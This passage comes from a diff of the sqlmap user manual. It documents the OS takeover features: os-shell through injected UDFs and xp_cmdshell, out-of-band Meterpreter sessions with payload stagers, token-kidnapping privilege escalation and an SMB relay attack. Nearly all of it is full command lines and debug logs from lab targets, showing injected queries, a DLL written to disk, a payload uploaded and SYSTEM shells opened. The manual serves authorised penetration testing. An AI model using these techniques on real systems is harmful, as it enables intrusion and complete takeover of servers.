+[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:03] [INFO] testing if current user is DBA
+[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:09] [INFO] xp_cmdshell extended procedure is available
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:11] [INFO] the SQL query provided returns 1 entries
+command standard output:
+---
+nt authority\network service
+---
+
+
+

+ +

It is also possible to simulate a real shell where you can type as many +arbitrary commands as you wish. The option is --os-shell and has +the same TAB completion and history functionalities implemented for +--sql-shell.

+ +

Example on a MySQL 5.0.67 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-shell -v 2
+
+[...]
+[hh:mm:36] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:36] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:36] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32))
+[hh:mm:36] [INFO] retrieved: 5.0.67
+[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds
+[hh:mm:37] [DEBUG] query: SELECT SLEEP(5)
+[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
+[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
+[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32))
+[hh:mm:42] [INFO] retrieved: C
+[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:42] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:42] [DEBUG] cleaning up the database management system
+[hh:mm:42] [DEBUG] removing support tables
+[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:42] [INFO] testing if current user is DBA
+[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=
+(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END)
+[hh:mm:42] [INFO] retrieved: 1
+[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds
+[hh:mm:43] [INFO] checking if sys_exec UDF already exist
+[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
+CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) 
+THEN 1 ELSE 0 END)
+[hh:mm:43] [INFO] retrieved: 0
+[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:43] [INFO] checking if sys_eval UDF already exist
+[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
+CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) 
+THEN 1 ELSE 0 END)
+[hh:mm:43] [INFO] retrieved: 0
+[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique
+[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to
+[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob)
+[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value
+[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the 
+support table
+[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table
+[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
+[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...])
+[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...])
+[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] cleaning up the database management system
+[hh:mm:44] [DEBUG] removing support tables
+[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file
+[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec
+[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll'
+[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file
+[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval
+[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME 
+'libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] creating a support table to write commands standard output to
+[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput
+[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
+[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
+operating system command execution
+[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami'))
+[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM 
+sqlmapoutput
+[hh:mm:41] [INFO] retrieved: nt authority\system
+[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds
+[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput
+command standard output:    'nt authority\system'
+
+os-shell> [TAB TAB]
+copy         del          dir          echo         md           mem          move         
+net          netstat -na  ver          whoami       xcopy        
+
+os-shell> exit
+[hh:mm:51] [INFO] cleaning up the database management system
+[hh:mm:51] [DEBUG] removing support tables
+[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] n
+do you want to remove sys_eval UDF? [Y/n] n
+[hh:mm:04] [INFO] database management system cleanup finished
+[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system 
+can only be deleted manually
+
+
+

+ +

Now run it again, but specifying the --union-use to retrieve the +command standard output quicker, via UNION based SQL injection, when the +parameter is affected also by inband SQL injection vulnerability:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-shell -v 2 --union-use
+
+[...]
+[hh:mm:16] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
+technique
+[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id'
+[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection 
+vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
+NULL, NULL, NULL# AND 528=528'
+
+[hh:mm:16] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:16] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:16] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
+MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173
+[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:16] [DEBUG] query: SELECT SLEEP(5)
+[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
+[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
+MID(@@datadir, 1, 1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:21] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:21] [DEBUG] cleaning up the database management system
+[hh:mm:21] [DEBUG] removing support tables
+[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:21] [INFO] testing if current user is DBA
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE 
+WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 
+1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:21] [INFO] checking if sys_exec UDF already exist
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
+((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=
+CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
+AND 4900=4900
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+sys_exec UDF already exists, do you want to overwrite it? [y/N] n
+[hh:mm:24] [INFO] checking if sys_eval UDF already exist
+[hh:mm:24] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
+((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=
+CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
+AND 4437=4437
+[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds
+sys_eval UDF already exists, do you want to overwrite it? [y/N] n
+[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested
+[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested
+[hh:mm:25] [DEBUG] creating a support table to write commands standard output to
+[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput
+[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
+[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
+operating system command execution
+[hh:mm:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> ipconfig
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig'))
+[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST
+(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND 
+7106=7106
+[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput
+command standard output:
+---
+
+Windows IP Configuration
+
+
+Ethernet adapter Local Area Connection 2:
+
+   Connection-specific DNS Suffix  . : localdomain
+   IP Address. . . . . . . . . . . . : 192.168.1.121
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+---Default Gateway . . . . . . . . . : 192.168.1.1
+
+os-shell> exit
+[hh:mm:41] [INFO] cleaning up the database management system
+[hh:mm:41] [DEBUG] removing support tables
+[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] n
+do you want to remove sys_eval UDF? [Y/n] n
+[hh:mm:54] [INFO] database management system cleanup finished
+[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system 
+can only be deleted manually
+
+
+

+ +

As you can see from this second example, sqlmap firstly check if the two +user-defined functions are already created, if so, it asks the user if he +wants to recreate them or keep them and save time.

Prompt for an out-of-band shell, meterpreter or VNC

Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

-

TODO

+

It is possible to establish an out-of-band TCP stateful channel +between the attacker and the underlying operating system by using the +exploited SQL injection as a stepping stone. This is implemented for MySQL, +PostgreSQL and Microsoft SQL Server. +sqlmap relies on the +Metasploit to perform this attack, so you need to have it already +on your system: it's free and can be downloaded from the homepage. It is +advised to use Metasploit 3.3 development version from the subversion +repository.

-

The techniques implemented are detailed on the white paper +

Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a MySQL 5.0.67 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:17] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:17] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:17] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:17] [INFO] retrieved: 5.0.67
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:23] [INFO] retrieved: C
+[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:23] [INFO] testing if current user is DBA
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if sys_exec UDF already exist
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N
+[hh:mm:24] [INFO] checking if sys_eval UDF already exist
+[hh:mm:24] [INFO] retrieved: 1
+[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N
+[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager
+[hh:mm:24] [INFO] which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 1
+[hh:mm:24] [INFO] which is the back-end DBMS address? [192.168.1.121] 192.168.1.121
+[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588
+[hh:mm:24] [INFO] which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 1
+[hh:mm:24] [INFO] which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 11
+[hh:mm:24] [INFO] creation in progress .................. done
+[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1
+[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version 
+above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
+It might only slow down a bit the execution of sqlmap
+[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe'
+[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+[*] Please wait while we load the module tree...
+[*] Started bind handler
+[*] Starting the payload handler...
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 192.168.1.121:61588)
+
+meterpreter > Loading extension priv...success.
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > ipconfig
+
+MS TCP Loopback interface
+Hardware MAC: 00:00:00:00:00:00
+IP Address  : 127.0.0.1
+Netmask     : 255.0.0.0
+
+
+
+VMware Accelerated AMD PCNet Adapter
+Hardware MAC: 00:0c:29:29:ee:86
+IP Address  : 192.168.1.121
+Netmask     : 255.255.255.0
+
+
+meterpreter > pwd
+C:\Program Files\MySQL\MySQL Server 5.0\Data
+meterpreter > exit
+
+
+

+ +

By default MySQL on Windows runs as SYSTEM, however PostgreSQL +run as a low-privileged user postgres on both Windows and Linux. +Microsoft SQL Server 2000 by default runs as SYSTEM, whereas +Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK +SERVICE and sometimes as LOCAL SERVICE.

+

It is possible to provide sqlmap with the --priv-esc option to +abuse Windows access tokens and escalate privileges to SYSTEM +within the Meterpreter session created if the underlying operating system +is not patched against Microsoft Security Bulletin +MS09-012. +sqlmap performs the +Windows Token kidnapping +technique by uploading +Churrasco +local exploit and using it to call the Metasploit's payload stager +executable. sqlmap uses also the Metasploit's Meterpreter +incognito +extension to abused Windows access tokens in conjunction to Churrasco +stand-alone exploit if the user wants so.

+ +

Note that this feature is not supported by sqlmap installed from the +DEB package because it relies on Churrasco, which is not explicitly free +software so it has not been included in the package.

+ +

This technique is detailed on the white paper +Advanced SQL injection to operating system full control.

+ +

Example on a Microsoft SQL Server 2005 Service Pack 0 running as +NETWORK SERVICE on the target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc
+
+[...]
+[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:17] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:22] [INFO] testing if current user is DBA
+[hh:mm:22] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:29] [INFO] xp_cmdshell extended procedure is available
+[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager
+which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 3
+which is the local address? [192.168.1.161] 
+which local port numer do you want to use? [61499] 
+[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
+that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' 
+extension to privilege escalate
+which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 
+[hh:mm:58] [INFO] creation in progress .................. done
+[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1
+[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version 
+above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
+It might only slow down a bit the execution of sqlmap
+[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe'
+[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no 
+Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito 
+extension to fail to list tokens
+do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its 
+argument so that it will be started as SYSTEM? [Y/n] y
+[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into 
+chunks, upload them and recreate the original file out of the binary chunks server-side, 
+wait..
+[hh:mm:22] [INFO] file chunk 1 written
+[14:10:06] [INFO] file chunk 2 written
+[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[*] Please wait while we load the module tree...
+[*] Handler binding to LHOST 0.0.0.0
+[*] Started reverse handler
+[*] Starting the payload handler...
+[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221)
+
+meterpreter > 
+[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of 
+Access Tokens availables. Choose which user you want to impersonate by using incognito's 
+command 'impersonate_token'
+Loading extension priv...success.
+meterpreter > Loading extension incognito...success.
+meterpreter > Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+Delegation Tokens Available
+========================================
+NT AUTHORITY\LOCAL SERVICE
+NT AUTHORITY\NETWORK SERVICE
+NT AUTHORITY\SYSTEM
+W2K3DEV\Administrator
+W2K3DEV\IUSR_WIN2003
+W2K3DEV\postgres
+
+Impersonation Tokens Available
+========================================
+NT AUTHORITY\ANONYMOUS LOGON
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+
+

+

One click prompt for an out-of-band shell, meterpreter or VNC

Options: --os-smbrelay, --priv-esc and --msf-path

-

TODO

+

If the back-end database management system runs as Administrator +and the underlying operating system is not patched against Microsoft +Security Bulletin +MS08-068, +sqlmap can abuse the universal naming convention (UNC) supported within +all database management systems to force the database server to initiate a +SMB connection with the attacker host, then perform a SMB authentication +relay attack in order to establish a high-privileged out-of-band TCP +stateful channel between the attacker host and the target database +server. +sqlmap relies on +Metasploit's SMB relay exploit to perform this attack, so you need +to have it already on your system: it's free and can be downloaded from the +homepage. +You need to run sqlmap as root user if you want to perform a SMB +relay attack because it will need to listen on a user-specified SMB TCP +port for incoming connection attempts.

-

The techniques implemented are detailed on the white paper +

Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

This technique is detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 running as +Administrator on the target:

+

+

+
+$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:11] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often 
+Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not 
+send the NTLM session hash when connecting to a SMB service
+[hh:mm:16] [INFO] which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 1
+[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161
+[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131
+[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
+[hh:mm:16] [INFO] which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 1
+[hh:mm:16] [INFO] which SMB port do you want to use?
+[1] 139/TCP (default)
+[2] 445/TCP
+> 1
+[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait..
+
+                _                  _       _ _
+               | |                | |     (_) |
+ _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
+| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
+| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
+|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
+                            | |
+                            |_|
+
+
+       =[ msf v3.3-dev
++ -- --=[ 392 exploits - 234 payloads
++ -- --=[ 20 encoders - 7 nops
+       =[ 168 aux
+
+resource> use windows/smb/smb_relay
+resource> set SRVHOST 192.168.1.161
+SRVHOST => 192.168.1.161
+resource> set SRVPORT 139
+SRVPORT => 139
+resource> set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+resource> set LPORT 4907
+LPORT => 4907
+resource> set RHOST 192.168.1.131
+RHOST => 192.168.1.131
+resource> exploit
+[*] Exploit running as background job.
+msf exploit(smb_relay) > 
+[*] Started bind handler
+[*] Server started.
+[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+Service Pack 2 LM:
+[*] Sending Access Denied to 192.168.1.131:3242 \
+[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+Server 2003 3790 Service Pack 2 LM:
+[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] AUTHENTICATED as W2K3DEV\Administrator...
+[*] Connecting to the ADMIN$ share...
+[*] Regenerating the payload...
+[*] Uploading payload...
+[*] Created \wELRmcmd.exe...
+[*] Connecting to the Service Control Manager...
+[*] Obtaining a service manager handle...
+[*] Creating a new service...
+[*] Closing service handle...
+[*] Opening service...
+[*] Starting the service...
+[*] Removing the service...
+[*] Closing service handle...
+[*] Deleting \wELRmcmd.exe...
+[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+Service Pack 2 LM:
+[*] Sending Access Denied to 192.168.1.131:3244 \
+[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+Server 2003 3790 Service Pack 2 LM:
+[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] AUTHENTICATED as W2K3DEV\Administrator...
+[*] Ignoring request from 192.168.1.131, attack already in progress.
+[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907)
+
+Active sessions
+===============
+
+  Id  Description  Tunnel                                       
+  --  -----------  ------                                       
+  1   Meterpreter  192.168.1.161:51813 -> 192.168.1.131:4907  
+
+msf exploit(smb_relay) > [*] Starting interaction with 1...
+
+meterpreter > [-] The 'priv' extension has already been loaded.
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+[*] Meterpreter session 1 closed.
+msf exploit(smb_relay) > exit
+
+[*] Server stopped.
+
+
+

+

Stored procedure buffer overflow exploitation

Options: --os-bof, --priv-esc and --msf-path

-

TODO

+

If the back-end database management system is not patched against Microsoft +Security Bulletin +MS09-004, +sqlmap can exploit the heap-based buffer overflow affecting +sp_replwritetovarbin stored procedure in order to establish an +out-of-band TCP stateful channel between the attacker host and the +target database server. +sqlmap has its own exploit to trigger the vulnerability, but it relies on +Metasploit to +generate the shellcode used within the exploit, so you need to have it +already on your system: it's free and can be downloaded from the homepage.

-

The techniques implemented are detailed on the white paper +

